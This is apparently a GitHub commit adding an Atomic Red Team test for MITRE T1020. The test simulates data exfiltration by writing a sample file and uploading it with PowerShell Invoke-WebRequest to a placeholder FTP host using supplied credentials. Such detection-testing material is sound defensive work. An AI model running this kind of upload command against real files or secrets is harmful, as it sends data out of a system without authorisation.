Update T1020.yaml

Atomic Test redcanaryco#2 - Exfiltration via Encrypted FTP Simulates encrypted file transfer to an FTP server, representing stealthy data exfiltration methods.
prashanthpulisetti · Jan 18, 2024 · 70663f6 · 70663f6
1 parent 32d9b8c
commit 70663f6
Showing 1 changed file with 35 additions and 0 deletions.
diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
@@ -29,3 +29,38 @@ atomic_tests:
       $fileName = "#{file}"
       Remove-Item -Path $fileName -ErrorAction Ignore
     name: powershell
+
+- name: Exfiltration via Encrypted FTP
+  auto_generated_guid: 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
+  description: Simulates encrypted file transfer to an FTP server.
+  supported_platforms:
+    - windows
+  input_arguments:
+    sampleFile:
+      description: Path of the sample file to exfiltrate.
+      type: String
+      default: C:\temp\T1020__FTP_sample.txt
+    ftpServer:
+      description: FTP server URL.
+      type: Url
+      default: ftp://example.com
+    credentials:
+      description: FTP server credentials.
+      type: String
+      default: [user:password]
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $sampleData = "Sample data for exfiltration test"
+      Set-Content -Path "#{sampleFile}" -Value $sampleData
+      $ftpUrl = "#{ftpServer}"
+      $creds = Get-Credential -Credential "#{credentials}"
+      Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
+  cleanup_command: |
+    Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
+  dependencies: []
+  prereq_command: ""
+  get_prereq_command: ""
+  notes:
+    - For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.